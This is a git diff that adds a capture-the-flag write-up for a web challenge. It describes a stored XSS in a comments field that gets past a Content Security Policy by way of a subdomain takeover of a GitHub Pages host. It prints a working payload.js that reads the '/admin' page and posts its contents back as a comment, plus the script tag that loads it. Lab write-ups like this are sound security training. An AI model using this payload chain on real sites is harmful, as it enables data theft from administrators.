diff options
Diffstat (limited to 'punkctf/web_02.md')
| -rw-r--r-- | punkctf/web_02.md | 23 |
1 files changed, 23 insertions, 0 deletions
diff --git a/punkctf/web_02.md b/punkctf/web_02.md new file mode 100644 index 0000000..a36bb47 --- /dev/null +++ b/punkctf/web_02.md @@ -0,0 +1,23 @@ + +We can still inject script tags into this comments field, but we can't embed scripts into them, because the CSP (Content Security POlicy) only allows us to load scripts from `*.<random-numbers>.ctf.one.dr.punksecurity.cloud`. + +Running the command they gave for subdomain takeover scanning we find that `docs.<...>` points to GitHub Pages, so we can set up a simple GitHub pages repo and use their subdomain to host whatever we want. `payload.js`: + +``` +fetch('/admin').then(r => r.text()).then(d => { + let data = new URLSearchParams(); + data.append('name', 'admin page'); + data.append('comment', d); + fetch('/new-comment', { + method: 'POST', + headers: { "Content-Type": "application/x-www-form-urlencoded" }, + body: data, + }); +}) +``` + +Then our comment just loads this script: + +``` +<script src="http://docs.47f325c9-f4c.ctf.one.dr.punksecurity.cloud/payload.js"></script> +``` |